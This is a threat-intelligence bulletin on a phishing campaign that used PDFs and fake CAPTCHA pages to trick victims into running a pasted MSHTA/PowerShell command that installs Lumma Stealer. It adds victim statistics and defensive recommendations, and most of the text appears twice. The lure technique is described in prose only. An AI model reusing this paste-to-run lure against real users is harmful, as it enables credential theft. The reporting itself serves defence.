5,000 Phishing PDFs on 260 Domains Distribute Lumma Stealer via Fake CAPTCHAs
Summary:
Netskope Threat Labs researchers expanded upon their report on threat actors leveraging fake CAPTCHAs for phishing on February 12th, 2025, with new research published in a blog post yesterday. After their initial investigation, they uncovered 260 unique domains hosting nearly 5,000 phishing PDF files that redirect victims to malicious websites either to steal credit card information or deliver Lumma Stealer via fake CAPTCHAs and PowerShell commands. To spread Lumma Stealer, the attackers created a PDF with embedded download images. Upon clicking the deceptive 'Download' image, users are taken to a website featuring a fraudulent CAPTCHA. If they then follow the instructions to paste their clipboard into the run prompt and execute it, an older version of PowerShell launches a concatenated MSHTA command. This command retrieves a subsequent PowerShell script, which in turn downloads and deploys the Lumma Stealer malware.
Since the latter half of 2024, these phishing campaigns tracked by Netskope have compromised over 1,150 organizations and more than 7,000 individual users. The technology, financial services, and manufacturing sectors were heavily targeted in this extensive phishing campaign, which primarily impacted victims across North America, Asia, and Southern Europe. Webflow was the most popular platform for hosting malicious PDF files used in phishing attacks, but GoDaddy, Strikingly, Wix, and Fastly also played significant roles in distributing this type of content. Phishing PDFs were strategically placed by attackers on platforms like pdfcoffee, pdf4pro, pdfbean, and the Internet Archive, expanding their victim pool to include those who search for documents on these dedicated sites, in addition to traditional search engine users lured via SEO poisoning.
Security Officer Comments:
The tactics outlined in this campaign demonstrate a sophisticated understanding of user behavior and search engine algorithms. The use of fake CAPTCHAs is particularly concerning, as it exploits a common security measure to gain user trust and the technique is becoming much more prevalent for cybercriminals. This campaign's focus on user manuals is a clever strategy, as it targets individuals actively seeking information, making them more likely to interact with the malicious content. The attacker’s reliance on SEO poisoning underscores the importance of search engine security and the need for users to exercise caution when clicking on search results. Additionally, the use of PDFs as a delivery mechanism highlights the ongoing vulnerability of this file format, despite improvements in security software. This campaign exemplifies that attackers are constantly evolving their techniques and that proactive threat intelligence is paramount in cybersecurity. Organizations must implement comprehensive security measures, including robust endpoint protection, user training for identifying phishing threats, and threat hunting, to mitigate the risks posed by such sophisticated attacks.
Suggested Corrections:
IOCs are available here.
https://thehackernews.com/2025/02/5000-phishing-pdfs-on-260-domains.html
Netskope Threat Labs researchers expanded upon their report on threat actors leveraging fake CAPTCHAs for phishing on February 12th, 2025, with new research published in a blog post yesterday. After their initial investigation, they uncovered 260 unique domains hosting nearly 5,000 phishing PDF files that redirect victims to malicious websites either to steal credit card information or deliver Lumma Stealer via fake CAPTCHAs and PowerShell commands. To spread Lumma Stealer, the attackers created a PDF with embedded download images. Upon clicking the deceptive 'Download' image, users are taken to a website featuring a fraudulent CAPTCHA. If they then follow the instructions to paste their clipboard into the run prompt and execute it, an older version of PowerShell launches a concatenated MSHTA command. This command retrieves a subsequent PowerShell script, which in turn downloads and deploys the Lumma Stealer malware.
Since the latter half of 2024, these phishing campaigns tracked by Netskope have compromised over 1,150 organizations and more than 7,000 individual users. The technology, financial services, and manufacturing sectors were heavily targeted in this extensive phishing campaign, which primarily impacted victims across North America, Asia, and Southern Europe. Webflow was the most popular platform for hosting malicious PDF files used in phishing attacks, but GoDaddy, Strikingly, Wix, and Fastly also played significant roles in distributing this type of content. Phishing PDFs were strategically placed by attackers on platforms like pdfcoffee, pdf4pro, pdfbean, and the Internet Archive, expanding their victim pool to include those who search for documents on these dedicated sites, in addition to traditional search engine users lured via SEO poisoning.
Security Officer Comments:
The tactics outlined in this campaign demonstrate a sophisticated understanding of user behavior and search engine algorithms. The use of fake CAPTCHAs is particularly concerning, as it exploits a common security measure to gain user trust and the technique is becoming much more prevalent for cybercriminals. This campaign's focus on user manuals is a clever strategy, as it targets individuals actively seeking information, making them more likely to interact with the malicious content. The attacker’s reliance on SEO poisoning underscores the importance of search engine security and the need for users to exercise caution when clicking on search results. Additionally, the use of PDFs as a delivery mechanism highlights the ongoing vulnerability of this file format, despite improvements in security software. This campaign exemplifies that attackers are constantly evolving their techniques and that proactive threat intelligence is paramount in cybersecurity. Organizations must implement comprehensive security measures, including robust endpoint protection, user training for identifying phishing threats, and threat hunting, to mitigate the risks posed by such sophisticated attacks.
Suggested Corrections:
IOCs are available here.
- User Education and Awareness: Train users to recognize phishing tactics, especially those involving fake CAPTCHA pages and suspicious prompts. Emphasize the dangers of clicking on unfamiliar links and executing system actions from untrusted sources.
- Cautious Web Browsing: Encourage users to avoid clicking on unfamiliar links and to verify any unexpected or suspicious requests for system actions.
- Web Filtering: Implement web filtering solutions to block known malicious URLs or those leading to phishing websites.
- Browser Security: Ensure all browsers have anti-phishing features enabled and are updated to the latest versions.
- PowerShell Logging and Auditing: Monitor and manage PowerShell usage, as it is not recommended to block the application due to its importance for system administration.
- Endpoint Protection: Deploy advanced endpoint protection solutions that can detect anomalous user behavior and block malware execution.
https://thehackernews.com/2025/02/5000-phishing-pdfs-on-260-domains.html